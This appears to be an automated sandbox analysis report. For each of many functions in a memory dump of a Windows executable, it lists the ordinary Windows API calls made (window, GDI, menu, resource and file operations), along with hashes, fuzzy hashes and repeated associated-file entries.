Instruction ID: 2fb94661ed3bd45f4c6cdb0b4f25d0cceb8d8fbdc1eb40c7d816f3195b4a6094
Opcode Fuzzy Hash: 3be31e3b2ea52e5ef1e186d18b649fd06ede5b0a46d106637fc5f32ac6dfc7dd
Instruction Fuzzy Hash: 2A413170A002589FDB20EF59CD81BCAB7F9AB58314F0040FAE608E7391D7799E948F59

Uniqueness

Uniqueness Score: -1.00%

Function 004115CA, Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,00411778), ref: 004115FF
GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00411623
GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 0041163E
LoadStringW.USER32(00000000,0000FFE8,?,00000100), ref: 004116D9

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 9a29827a3fd728bf2b0cd6498c6d9bbaa73586ecbe22f69a1342d5b23c7eb25d
Instruction ID: 13e9e8d60833b164552b521c0c3f839d6f93b56361f369a8dbf41084d0379fbb
Opcode Fuzzy Hash: 9a29827a3fd728bf2b0cd6498c6d9bbaa73586ecbe22f69a1342d5b23c7eb25d
Instruction Fuzzy Hash: 86415470A002589FDB20EF59CC81BDAB7F9AB58314F0040FAE608E7391D7799E948F59

Uniqueness

Uniqueness Score: -1.00%

Function 00434158, Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00431F8C: EnterCriticalSection.KERNEL32(0050AF20,00000000,004340D5,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00431F94
Part of subcall function 00431F8C: LeaveCriticalSection.KERNEL32(0050AF20,0050AF20,00000000,004340D5,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00431FA1
Part of subcall function 00431F8C: EnterCriticalSection.KERNEL32(?,0050AF20,0050AF20,00000000,004340D5,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00431FAA

Part of subcall function 00435C44: GetDC.USER32(00000000), ref: 00435C9A
Part of subcall function 00435C44: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00435CAF
Part of subcall function 00435C44: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00435CB9
Part of subcall function 00435C44: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,004341AB,00000000,00434237), ref: 00435CDD
Part of subcall function 00435C44: ReleaseDC.USER32 ref: 00435CE8

CreateCompatibleDC.GDI32(00000000), ref: 004341AD
SelectObject.GDI32(00000000,?), ref: 004341C6
SelectPalette.GDI32(00000000,?,000000FF), ref: 004341EF
RealizePalette.GDI32(00000000), ref: 004341FB

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
String ID:
API String ID: 979337279-0
Opcode ID: fff205d747e362ac45f31b29a96dbe3da15874876ea942b91e2107e9cca26013
Instruction ID: d87175d742e0276230b70ddd67f8b8822d88cc7ec207c53e0907679b65e79936
Opcode Fuzzy Hash: fff205d747e362ac45f31b29a96dbe3da15874876ea942b91e2107e9cca26013
Instruction Fuzzy Hash: D6310774A00658EFCB04EB59C981D9EB3F5EF4C324B6251A6F804AB366C738EE41DB54

Uniqueness

Uniqueness Score: -1.00%

Function 004FAF4C, Relevance: 6.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

OffsetRect.USER32(00000000,?,00000000), ref: 004FAFB0
OffsetRect.USER32(00000000,00000000,?), ref: 004FAFCB
OffsetRect.USER32(00000000,?,00000000), ref: 004FAFE5
OffsetRect.USER32(00000000,00000000,?), ref: 004FB000

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: OffsetRect
String ID:
API String ID: 177026234-0
Opcode ID: cb210d1bcc2253a2864a3c19c642cccce1b14fcde6a59f5816a3f89f47b6fa68
Instruction ID: 3950c7e52b127766a66e38bdb4d7a031cdb43fbd1104537f8e92d08780ab70a9
Opcode Fuzzy Hash: cb210d1bcc2253a2864a3c19c642cccce1b14fcde6a59f5816a3f89f47b6fa68
Instruction Fuzzy Hash: 0C2183B67042066FC700DE69CC85E6B77DAEBC4344F54C92AF644C7256E734EC0587A6

Uniqueness

Uniqueness Score: -1.00%

Function 0045EEC0, Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

APIs

IsZoomed.USER32(00000000), ref: 0045EED5
GetParent.USER32(00000000), ref: 0045EEEA
GetWindowRect.USER32 ref: 0045EF03
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000016,00000000,?,00000000), ref: 0045EF6E

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ParentRectZoomed
String ID:
API String ID: 3993858495-0
Opcode ID: 9a4097bf0349ef7ade5e9f310e3313f7b90b741e126976eed66f22a81cc51267
Instruction ID: 41642b7a77ac7db3b31fab53975f0018cf67021daefd6c497e2176d5a0a4b7bb
Opcode Fuzzy Hash: 9a4097bf0349ef7ade5e9f310e3313f7b90b741e126976eed66f22a81cc51267
Instruction Fuzzy Hash: 2421D935600104AFDB14EF6DC481E9EB3F5AF18305B20455AFA84E7392EB36EE54CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0047B090, Relevance: 6.1, APIs: 4, Instructions: 75threadwindowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000004), ref: 0047B0A0
GetWindowThreadProcessId.USER32(?,?), ref: 0047B0BD
GetCurrentProcessId.KERNEL32(?,00000004), ref: 0047B0C9
IsWindowVisible.USER32 ref: 0047B11F

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Process$CurrentThreadVisible
String ID:
API String ID: 3926708836-0
Opcode ID: 244113c8ad9d5ac25f580ebf26d470919350f8359faf86d05392c37ce22d0f28
Instruction ID: d67c3866086eed8f2567cea6c2f7e2bd062bd02c680e354b8e5b6e5be24fa7c2
Opcode Fuzzy Hash: 244113c8ad9d5ac25f580ebf26d470919350f8359faf86d05392c37ce22d0f28
Instruction Fuzzy Hash: 07212C35600240DBE701EB69D9D1FEA73B8EB18314F948177E91897362D738AD058BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00453328, Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetMenuState.USER32 ref: 0045334B
GetSubMenu.USER32 ref: 00453356
GetMenuItemID.USER32(?,?), ref: 0045336F
GetMenuStringW.USER32 ref: 004533C4

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$ItemStateString
String ID:
API String ID: 306270399-0
Opcode ID: e0b2aff8d3505fd393e0f2f4e7ded4eca910dea1ab6ba8c59c152b7a326c5404
Instruction ID: e2a2a4d282d0096dd30e61f6a4ca1df5a3037ec28ed59cd430e3acd2e0ba8e80
Opcode Fuzzy Hash: e0b2aff8d3505fd393e0f2f4e7ded4eca910dea1ab6ba8c59c152b7a326c5404
Instruction Fuzzy Hash: 45115131611118AFC700EE6ECC459AF77E8AF49396B10456BFC09D7393DA38DE0597A8

Uniqueness

Uniqueness Score: -1.00%

Function 00480C94, Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,00480D3B,?,?,?,?,00000000), ref: 00480CCA
DeleteFileW.KERNEL32(00000000,00000000,00480D3B,?,?,?,?,00000000), ref: 00480CF1
GetLastError.KERNEL32(00000000,00000000,00480D3B,?,?,?,?,00000000), ref: 00480D00
MoveFileW.KERNEL32(00000000,00000000), ref: 00480D1A

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Move$DeleteErrorLast
String ID:
API String ID: 3032323431-0
Opcode ID: 3544a80a1afb362c6ba675a943a1b19a78f915b6c292b445f862dfc6c9b9cef2
Instruction ID: 7f3b113f1acf62cc89dab94fccb5dc75004b554c2e88a941b9d914c948e82687
Opcode Fuzzy Hash: 3544a80a1afb362c6ba675a943a1b19a78f915b6c292b445f862dfc6c9b9cef2
Instruction Fuzzy Hash: 6901C471710354AADB21BFBA8C8296E72DCDB4170CB62497BF001E3692DA3DAD19821D

Uniqueness

Uniqueness Score: -1.00%

Function 004FABE0, Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(F8031024,00000008,?), ref: 004FABF5
MulDiv.KERNEL32(E8C38B57,00000008,?), ref: 004FAC09
MulDiv.KERNEL32(FFF77F9E,00000008,?), ref: 004FAC1D
MulDiv.KERNEL32(E8C38B50,00000008,?), ref: 004FAC3B

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aeca573a1f523cd84a5b6c5d94893b92d42509870cb5d486b4303d0bd25cd7f
Instruction ID: 99f03527093ba141d6bc40404b96c78c056c1ce667647233cc714bd5f382aa4c
Opcode Fuzzy Hash: 5aeca573a1f523cd84a5b6c5d94893b92d42509870cb5d486b4303d0bd25cd7f
Instruction Fuzzy Hash: EF115E72604248AFCB44DE9DC884E9A7BECEF49364F1041A6BA08DB256D635DD00CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004371D0, Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

GetIconInfo.USER32(?,?), ref: 004371F1
GetObjectW.GDI32(?,00000018,?,00000000,0043724D,?,?,?), ref: 00437212
DeleteObject.GDI32(?), ref: 0043723E
DeleteObject.GDI32(?), ref: 00437247

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Delete$IconInfo
String ID:
API String ID: 507670407-0
Opcode ID: eafc0576186234d666b26eab3bf862f164babea7372ad63040be5848730273f8
Instruction ID: 237573efb7d07f23659b9a36111f59eba5243dce53b0c9d3b6df79918595ad87
Opcode Fuzzy Hash: eafc0576186234d666b26eab3bf862f164babea7372ad63040be5848730273f8
Instruction Fuzzy Hash: 201142B5A04204AFDB14DFA6D981D9EF7F9EB8C310F1080AAF944E7351D634DD04CA54

Uniqueness

Uniqueness Score: -1.00%

Function 0045AB18, Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?), ref: 0045AB2D
MulDiv.KERNEL32(?), ref: 0045AB4A
MulDiv.KERNEL32(?), ref: 0045AB67
MulDiv.KERNEL32(?), ref: 0045AB84

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d09a4a738704cd79c13d422565b661aeebc8cb04668fc7712c103bd51324070
Instruction ID: 2d14abfe5467a2a3f9f9f11384c12630c08dbb79469c23f87f0f05b8c0661458
Opcode Fuzzy Hash: 0d09a4a738704cd79c13d422565b661aeebc8cb04668fc7712c103bd51324070
Instruction Fuzzy Hash: 7D01562130024CABCB64BD275C44F9B7A5EDF82755B00413E7E2A9B353E96CEC1483A8

Uniqueness

Uniqueness Score: -1.00%

Function 0045AB9C, Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?), ref: 0045ABB1
MulDiv.KERNEL32(?), ref: 0045ABCB
MulDiv.KERNEL32(?), ref: 0045ABE8
MulDiv.KERNEL32(?), ref: 0045AC05

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06f21a4a6913cabdd891ad792af731c2aaea4be6a0c140d5fafcc18630e585cd
Instruction ID: d2d2d10dfd6d333d919af8afa6fafe424737bf13a2787c07879e9aebbf0cf12a
Opcode Fuzzy Hash: 06f21a4a6913cabdd891ad792af731c2aaea4be6a0c140d5fafcc18630e585cd
Instruction Fuzzy Hash: B1018B213002086BCB28BD275C85F5B7A9EDFC2754B00413E7D1A9B353E9BCED1483A8

Uniqueness

Uniqueness Score: -1.00%

Function 00463480, Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?), ref: 00463498
MulDiv.KERNEL32(?), ref: 004634B2
MulDiv.KERNEL32(?), ref: 004634CF
MulDiv.KERNEL32(?), ref: 004634EC

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0e0456dfea3bad6c77b598901b22a6061f589eb9f1a3e53e110156495351957
Instruction ID: 405954b8e44ee07b894c05496ad210b7abba4dbc0493be042e276050902fd990
Opcode Fuzzy Hash: c0e0456dfea3bad6c77b598901b22a6061f589eb9f1a3e53e110156495351957
Instruction Fuzzy Hash: FE012C213002486BC724BE275C45F5BBA5EDFC2755B00807E781A9B357EDB89E0486A5

Uniqueness

Uniqueness Score: -1.00%

Function 00426A4C, Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(00400000,?,?,0042178C,00400000,00000001,00000000,?,0042698E,00000000,00000000,?,00000000,?,?,004DE870), ref: 00426A63
LoadResource.KERNEL32(00400000,00426AE8,00400000,?,?,0042178C,00400000,00000001,00000000,?,0042698E,00000000,00000000,?,00000000,?), ref: 00426A7D
SizeofResource.KERNEL32(00400000,00426AE8,00400000,00426AE8,00400000,?,?,0042178C,00400000,00000001,00000000,?,0042698E,00000000,00000000), ref: 00426A97
LockResource.KERNEL32(0042652C,00000000,00400000,00426AE8,00400000,00426AE8,00400000,?,?,0042178C,00400000,00000001,00000000,?,0042698E,00000000), ref: 00426AA1

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: fbb838dfb8a984f98673c35adeec76654e77647bee0350a6b9b467abf03efca3
Instruction ID: 432f08dde49b013c1c90c5113a1f6abd0d78333a01f7ecda222a99177f0c13f5
Opcode Fuzzy Hash: fbb838dfb8a984f98673c35adeec76654e77647bee0350a6b9b467abf03efca3
Instruction Fuzzy Hash: 58F0ADB3204210AF8B45EE6DA881D2B73ECEE88364311402FF818DB207DA39DD01837C

Uniqueness

Uniqueness Score: -1.00%

Function 004122DA, Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

InterlockedCompareExchange.KERNEL32(00508CC8,00000001,00000000), ref: 004122F5
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00508CC8,00000001,00000000), ref: 0041230C
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041232B
ResetEvent.KERNEL32(00000000), ref: 00412333

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$Create$CompareExchangeInterlockedReset
String ID:
API String ID: 2790937731-0
Opcode ID: 0b6e7f95aa852f2112274bb35bc7b4f38d397d601fbb649b345fd42333303064
Instruction ID: 15a20e893dbf27fb58bd0bfc73e983c82d05cf0c84bbe54bd10fc2f3c5e9e0e8
Opcode Fuzzy Hash: 0b6e7f95aa852f2112274bb35bc7b4f38d397d601fbb649b345fd42333303064
Instruction Fuzzy Hash: EDF03071380304BAFB3155224E42BA715549B90B69F244076FF14FE2C2D6FC9C51826D

Uniqueness

Uniqueness Score: -1.00%

Function 004CE7B4, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000), ref: 004CE806

Strings

Setting NTFS compression on directory: %s, xrefs: 004CE7D3
Failed to set NTFS compression state (%d)., xrefs: 004CE817
Unsetting NTFS compression on directory: %s, xrefs: 004CE7EB

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
